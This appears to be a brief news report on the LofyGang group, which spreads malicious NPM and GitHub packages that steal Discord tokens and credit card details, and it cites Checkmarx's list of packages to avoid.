LofyGang Criminals Infiltrates Discord Accounts
Two YouTube tutorial videos owned by the LofyGang hackers teach other threat actors how to effectively utilize their hacking tools. So far, both videos have amassed more than 10,000 views each.
The operators behind the hacking tools even boast that they offer 24/7 customer service support for their client base, this is all done through the LofyGang Discord channel established only a year ago. Now the irony is that the LofyGang hacking group is responsible for a devastating scam that targets the Discord social messaging platform.
Further, the hackers’ Discord channel, also hosts giveaways of Discord Nitro to promote their suite of hacking tools. The malicious threat actors offer its members the “Lofy Boost” Discord bot, with this users can purchase the Discord Nitro even with stolen credit card info, that they’ve stolen from other Discord members.
After Nitro purchases, the bot gets access to user tokens, which the hackers could use in their phishing and hacking scams.
Subsequent misuse of stolen credit card data is already observed by several cyber security companies, who note that the hackers’ supply chain infections were bolstered by promotions on the GitHub and NPM codes platforms.
The documented promotion revealed that it was laced with a virus through a malicious backdoor attached to the LofyGang hacking tools. However, cyber analysts warned that being easily accessible on NPM and GitHub, naive hackers could freely access causing a massive data breach.
It was also noted that numerous NPMs are advertised as Discord development packages, or in some contexts, as some packages are associated with text, files, and colors.
So far, the LofyGang prolific hacking tools and how to use knowledge are being shared on many dark web forums.
Additionally, hacking communities have posted links to GitHub, where threat actors can access numerous programs advertised such as a Discord spammer, a Nitro generator, and even a password stealer. Also, advertised the hackers two additional menaces to the Discord community; a Discord webhook concealing module, as well as a Discord token grabber.
The primary Discord malware created by LofyGang replaces the safe version of the program on the infected system with a malicious one that steals credit card details each time a user pays a membership fee.
Researchers of the LofyGang’s malware detailed its absence from the primarily offered packages. However, it is later fetched as a dependency, which makes it impossible for the buyers to recognize the purchased tools are maliciously coded with malware. This also prevents its deletion by hosting providers like GitHub.
Additionally, the notorious LofyGang fragments its harmful operation as much as possible. Thus, allowing the hackers to avoid coordinated deletion, their packages are being offered through 50 plus NPM accounts.
Checkmarx cyber researchers have created a comprehensive list of the hackers’ packages posted on GitHub and NPM platforms. These packages they warned must be avoided, and quickly removed if installed by unsuspecting victims.